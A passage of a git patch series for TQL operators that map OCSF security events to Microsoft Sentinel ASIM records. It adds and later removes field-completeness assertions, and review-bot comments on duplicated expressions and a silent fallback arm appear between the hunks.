"asim.audit_event" diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 15bb103..ce7a181 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF File System Activity events to Microsoft Sentinel ASIM FileEvent records. --- +assert class_uid == 1001 + microsoft::asim::ocsf::helpers::common @name = "asim.file_event" diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index b978972..3d1dc72 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql 
@@ -2,6 +2,8 @@ description: Maps OCSF Group Management events to Microsoft Sentinel ASIM UserManagement events. --- +assert class_uid == 3006 + microsoft::asim::ocsf::helpers::common @name = "asim.user_management" diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 8566279..8322abb 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF HTTP Activity events to Microsoft Sentinel ASIM WebSession records. --- +assert class_uid == 4002 + microsoft::asim::ocsf::helpers::common @name = "asim.web_session" diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index 86c1c73..ce8042a 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF Network Activity events to Microsoft Sentinel ASIM NetworkSession records. --- +assert class_uid == 4001 + microsoft::asim::ocsf::helpers::common @name = "asim.network_session" diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 4fbe522..e537148 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF Process Activity events to Microsoft Sentinel ASIM ProcessEvent records. --- +assert class_uid == 1007 + microsoft::asim::ocsf::helpers::common @name = "asim.process_event" diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index ae4a255..d41fa99 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql 
@@ -2,6 +2,8 @@ description: Maps OCSF Scheduled Job Activity events to Microsoft Sentinel ASIM AuditEvent records. --- +assert class_uid == 1006 + microsoft::asim::ocsf::helpers::common @name = "asim.audit_event" diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index 8ea03c0..fc46d69 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -2,6 +2,8 @@ description: Maps OCSF Windows Service Activity events to Microsoft Sentinel ASIM AuditEvent records. --- +assert class_uid == 201004 + microsoft::asim::ocsf::helpers::common @name = "asim.audit_event" From b2272a523b3d478b5f23f80f6026081b2ddfa706 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:21:10 +0200 Subject: [PATCH 11/27] Move ASIM OCSF preconditions up Assert required source OCSF fields before common mapper setup instead of checking derived ASIM fields after mapping work has already run. Assisted-by: GPT-5 Codex (Superconductor) --- .../operators/asim/ocsf/compliance_finding.tql | 3 ++- .../operators/asim/ocsf/detection_finding.tql | 3 ++- microsoft/operators/asim/ocsf/dhcp_activity.tql | 4 ++-- microsoft/operators/asim/ocsf/dns_activity.tql | 3 ++- .../operators/asim/ocsf/entity_management.tql | 3 ++- .../operators/asim/ocsf/event_log_activity.tql | 3 ++- .../asim/ocsf/file_system_activity.tql | 4 ++-- .../operators/asim/ocsf/group_management.tql | 3 ++- microsoft/operators/asim/ocsf/http_activity.tql | 3 ++- .../operators/asim/ocsf/process_activity.tql | 17 +++++------------ .../asim/ocsf/scheduled_job_activity.tql | 3 ++- .../asim/ocsf/windows_service_activity.tql | 3 ++- 12 files changed, 27 insertions(+), 25 deletions(-) diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 6bab6c7..4384cff 100644 
--- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -3,6 +3,8 @@ description: Maps OCSF Compliance Finding events to Microsoft Sentinel ASIM Aler --- assert class_uid == 2003 +assert (finding_info?.uid? else metadata?.original_event_uid?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.alert_event"} microsoft::asim::ocsf::helpers::common @@ -11,7 +13,6 @@ asim.EventSchema = "AlertEvent" asim.EventSchemaVersion = "0.1" asim.EventType = "Alert" asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? -assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.AlertName = ocsf.finding_info?.title? else ocsf.message? asim.EventReportUrl = ocsf.finding_info?.url? else null diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 67be606..54ae6af 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -3,6 +3,8 @@ description: Maps OCSF Detection Finding events to Microsoft Sentinel ASIM Alert --- assert class_uid == 2004 +assert (finding_info?.uid? else metadata?.original_event_uid?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.alert_event"} let $threat_categories = { adware: "Adware", 
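Review bot: The new precondition hard-codes `name: "asim.alert_event"` although the same mapper assigns `@name = "asim.alert_event"` further down, and the required-field expression `finding_info?.uid? else metadata?.original_event_uid?` is now spelled twice, once in the assert and once in `asim.EventUid = ...`; either copy can drift silently. The same duplication is introduced in the detection_finding, dhcp_activity, dns_activity and entity_management hunks. Binding the expression once (`let $uid = finding_info?.uid? else metadata?.original_event_uid?`, in the style detection_finding already uses for `$threat_categories`) and using it in both places removes one copy; moving `@name` above the assert would remove the other, provided the attribute survives the `this = {ocsf: this, asim: {}}` rebind in `helpers::common`.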
@@ -26,7 +28,6 @@ asim.EventSchema = "AlertEvent" asim.EventSchemaVersion = "0.1" asim.EventType = "Alert" asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? -assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.AlertName = ocsf.finding_info?.title? else ocsf.message? asim.EventReportUrl = ocsf.finding_info?.url? else null diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index a168f31..e9a329b 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -3,6 +3,8 @@ description: Maps OCSF DHCP Activity events to Microsoft Sentinel ASIM DhcpEvent --- assert class_uid == 4004 +assert src_endpoint?.ip? != null and src_endpoint?.mac? != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.dhcp_event"} microsoft::asim::ocsf::helpers::common @@ -18,7 +20,5 @@ match ocsf.activity_name { asim.SrcHostname = ocsf.src_endpoint?.hostname? else ocsf.src_endpoint?.ip?.string() asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcMacAddr = ocsf.src_endpoint?.mac? -assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 50731b3..0b2d829 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql 
@@ -3,6 +3,8 @@ description: Maps OCSF DNS Activity events to Microsoft Sentinel ASIM Dns record --- assert class_uid == 4003 +assert query?.hostname? != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.dns"} microsoft::asim::ocsf::helpers::common @@ -23,6 +25,5 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? asim.DstIpAddr = ocsf.dst_endpoint?.ip? asim.DstHostname = ocsf.dst_endpoint?.hostname? -assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 4e12fb3..c985b45 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -3,6 +3,8 @@ description: Maps OCSF Entity Management events to Microsoft Sentinel ASIM Audit --- assert class_uid == 3004 +assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"} microsoft::asim::ocsf::helpers::common 
@@ -26,7 +28,6 @@ match ocsf.activity_name { } asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Directory Service Object" asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index bace4cc..01658bb 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -3,6 +3,8 @@ description: Maps OCSF Event Log Activity events to Microsoft Sentinel ASIM Audi --- assert class_uid == 1008 +assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"} microsoft::asim::ocsf::helpers::common 
@@ -26,7 +28,6 @@ match ocsf.activity_name { } asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Event Log" asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index ce7a181..47e9db3 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -3,6 +3,8 @@ description: Maps OCSF File System Activity events to Microsoft Sentinel ASIM Fi --- assert class_uid == 1001 +assert (actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?) != null and (file?.path? else file?.name?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.file_event"} microsoft::asim::ocsf::helpers::common 
@@ -33,7 +35,5 @@ if ocsf.activity_name == "Rename" and ocsf.file_result? != null { asim.TargetFileName = ocsf.file_result.name? else asim.TargetFileName } asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local" -assert asim.ActorUsername != null and asim.TargetFilePath != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 3d1dc72..4db83aa 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -3,6 +3,8 @@ description: Maps OCSF Group Management events to Microsoft Sentinel ASIM UserMa --- assert class_uid == 3006 +assert (actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.user_management"} microsoft::asim::ocsf::helpers::common @@ -15,7 +17,6 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null 
diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 8322abb..27ad455 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -3,6 +3,8 @@ description: Maps OCSF HTTP Activity events to Microsoft Sentinel ASIM WebSessio --- assert class_uid == 4002 +assert http_request?.url?.url_string? != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.web_session"} microsoft::asim::ocsf::helpers::common @@ -16,6 +18,5 @@ asim.EventResultDetails = ocsf.http_response?.code?.string() else ocsf.status_co if ocsf.http_response?.code? != null { asim.EventResult = "Success" if ocsf.http_response.code < 400 else "Failure" } -assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index e537148..4f0c27d 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql 
@@ -3,6 +3,10 @@ description: Maps OCSF Process Activity events to Microsoft Sentinel ASIM Proces
 ---
 assert class_uid == 1007
+assert activity_name? in ["Launch", "Terminate"],
+ message={reason: "unsupported OCSF to ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.process_event"}
+assert (actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?) != null and process?.pid? != null and (process?.name? else process?.file?.name? else process?.path?) != null and process?.cmd_line? != null,
+ message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.process_event"}
 microsoft::asim::ocsf::helpers::common
@@ -12,16 +16,7 @@ asim.EventSchemaVersion = "0.1.4"
 match ocsf.activity_name {
 "Launch" => { asim.EventType = "ProcessCreated" }
 "Terminate" => { asim.EventType = "ProcessTerminated" }
- _ => {
- assert false, message={
- reason: "unsupported OCSF to ASIM mapping",
- class_uid: ocsf.class_uid?,
- class_name: ocsf.class_name?,
- type_uid: ocsf.type_uid?,
- type_name: ocsf.type_name?,
- name: @name,
- }
- }
+ _ => {}
 }
 asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid?
 if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null {
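Review bot: The new `_ => {}` arm in the second hunk turns the unsupported-activity case into a silent no-op, so the mapper's correctness now depends entirely on the `activity_name? in ["Launch", "Terminate"]` guard staying above the `common` helper; the very next commit in this series (the process_activity hunk of PATCH 12/27) removes that guard and keeps the empty arm, at which point an OCSF Process Activity with any other activity, or with no `activity_name` at all, is emitted as an ASIM ProcessEvent whose `EventType` is null rather than `ProcessCreated`/`ProcessTerminated`. It is also not visible here whether `assert` treats the null that `activity_name? in [...]` yields for a missing `activity_name` as a failure, so a null activity may already pass the guard in this commit. Keep the `assert false, message={…}` body in the fallback arm so the two guards cannot drift, or at minimum annotate the arm with `# unreachable while the activity_name precondition above holds`. The mapper continues outside this hunk.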
@@ -36,7 +31,5 @@ asim.TargetProcessId = ocsf.process?.pid?.string() asim.TargetProcessName = ocsf.process?.name? else ocsf.process?.file?.name? else ocsf.process?.path?.split("\\")[-1] asim.TargetProcessCommandLine = ocsf.process?.cmd_line? asim.TargetUserId = ocsf.user?.uid? -assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index d41fa99..62d4db5 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -3,6 +3,8 @@ description: Maps OCSF Scheduled Job Activity events to Microsoft Sentinel ASIM --- assert class_uid == 1006 +assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"} microsoft::asim::ocsf::helpers::common 
@@ -26,7 +28,6 @@ match ocsf.activity_name { } asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Scheduled Task" asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index fc46d69..1fc5782 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -3,6 +3,8 @@ description: Maps OCSF Windows Service Activity events to Microsoft Sentinel ASI --- assert class_uid == 201004 +assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null, + message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"} microsoft::asim::ocsf::helpers::common 
@@ -26,7 +28,6 @@ match ocsf.activity_name { } asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -assert asim.Object != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: ocsf.class_uid, class_name: ocsf.class_name, type_uid: ocsf.type_uid, type_name: ocsf.type_name, name: @name} asim.ObjectType = "Service" asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { From bfa6182ebee176b199d9367020ed887cf6d87000 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:27:43 +0200 Subject: [PATCH 12/27] Allow best-effort ASIM OCSF mapping Keep class_uid guards on leaf mappers, but remove field-completeness assertions so supported OCSF classes can map whatever ASIM fields are available. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/ocsf/compliance_finding.tql | 2 -- microsoft/operators/asim/ocsf/detection_finding.tql | 2 -- microsoft/operators/asim/ocsf/dhcp_activity.tql | 2 -- microsoft/operators/asim/ocsf/dns_activity.tql | 2 -- microsoft/operators/asim/ocsf/entity_management.tql | 2 -- microsoft/operators/asim/ocsf/event_log_activity.tql | 2 -- microsoft/operators/asim/ocsf/file_system_activity.tql | 2 -- microsoft/operators/asim/ocsf/group_management.tql | 2 -- microsoft/operators/asim/ocsf/http_activity.tql | 2 -- microsoft/operators/asim/ocsf/process_activity.tql | 4 ---- microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 2 -- microsoft/operators/asim/ocsf/windows_service_activity.tql | 2 -- 12 files changed, 26 deletions(-) 
diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql
index 4384cff..3652d12 100644
--- a/microsoft/operators/asim/ocsf/compliance_finding.tql
+++ b/microsoft/operators/asim/ocsf/compliance_finding.tql
@@ -3,8 +3,6 @@ description: Maps OCSF Compliance Finding events to Microsoft Sentinel ASIM Aler
 ---
 assert class_uid == 2003
-assert (finding_info?.uid? else metadata?.original_event_uid?) != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.alert_event"}
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql
index 54ae6af..064f73b 100644
--- a/microsoft/operators/asim/ocsf/detection_finding.tql
+++ b/microsoft/operators/asim/ocsf/detection_finding.tql
@@ -3,8 +3,6 @@ description: Maps OCSF Detection Finding events to Microsoft Sentinel ASIM Alert
 ---
 assert class_uid == 2004
-assert (finding_info?.uid? else metadata?.original_event_uid?) != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.alert_event"}
 let $threat_categories = {
 adware: "Adware",
diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql
index e9a329b..7b3e052 100644
--- a/microsoft/operators/asim/ocsf/dhcp_activity.tql
+++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql
@@ -3,8 +3,6 @@ description: Maps OCSF DHCP Activity events to Microsoft Sentinel ASIM DhcpEvent
 ---
 assert class_uid == 4004
-assert src_endpoint?.ip? != null and src_endpoint?.mac? != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.dhcp_event"}
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql
index 0b2d829..dff6438 100644
--- a/microsoft/operators/asim/ocsf/dns_activity.tql
+++ b/microsoft/operators/asim/ocsf/dns_activity.tql
@@ -3,8 +3,6 @@ description: Maps OCSF DNS Activity events to Microsoft Sentinel ASIM Dns record
 ---
 assert class_uid == 4003
-assert query?.hostname? != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.dns"}
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql
index c985b45..eb0025a 100644
--- a/microsoft/operators/asim/ocsf/entity_management.tql
+++ b/microsoft/operators/asim/ocsf/entity_management.tql
@@ -3,8 +3,6 @@ description: Maps OCSF Entity Management events to Microsoft Sentinel ASIM Audit
 ---
 assert class_uid == 3004
-assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"}
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql
index 01658bb..1f60436 100644
--- a/microsoft/operators/asim/ocsf/event_log_activity.tql
+++ b/microsoft/operators/asim/ocsf/event_log_activity.tql
@@ -3,8 +3,6 @@ description: Maps OCSF Event Log Activity events to Microsoft Sentinel ASIM Audi
 ---
 assert class_uid == 1008
-assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"}
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql
index 47e9db3..9403a76 100644
--- a/microsoft/operators/asim/ocsf/file_system_activity.tql
+++ b/microsoft/operators/asim/ocsf/file_system_activity.tql
@@ -3,8 +3,6 @@ description: Maps OCSF File System Activity events to Microsoft Sentinel ASIM Fi
 ---
 assert class_uid == 1001
-assert (actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?) != null and (file?.path? else file?.name?) != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.file_event"}
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql
index 4db83aa..d5ec64b 100644
--- a/microsoft/operators/asim/ocsf/group_management.tql
+++ b/microsoft/operators/asim/ocsf/group_management.tql
@@ -3,8 +3,6 @@ description: Maps OCSF Group Management events to Microsoft Sentinel ASIM UserMa
 ---
 assert class_uid == 3006
-assert (actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid?) != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.user_management"}
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql
index 27ad455..9c06324 100644
--- a/microsoft/operators/asim/ocsf/http_activity.tql
+++ b/microsoft/operators/asim/ocsf/http_activity.tql
@@ -3,8 +3,6 @@ description: Maps OCSF HTTP Activity events to Microsoft Sentinel ASIM WebSessio
 ---
 assert class_uid == 4002
-assert http_request?.url?.url_string? != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.web_session"}
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql
index 4f0c27d..3395d3f 100644
--- a/microsoft/operators/asim/ocsf/process_activity.tql
+++ b/microsoft/operators/asim/ocsf/process_activity.tql
@@ -3,10 +3,6 @@ description: Maps OCSF Process Activity events to Microsoft Sentinel ASIM Proces
 ---
 assert class_uid == 1007
-assert activity_name? in ["Launch", "Terminate"],
- message={reason: "unsupported OCSF to ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.process_event"}
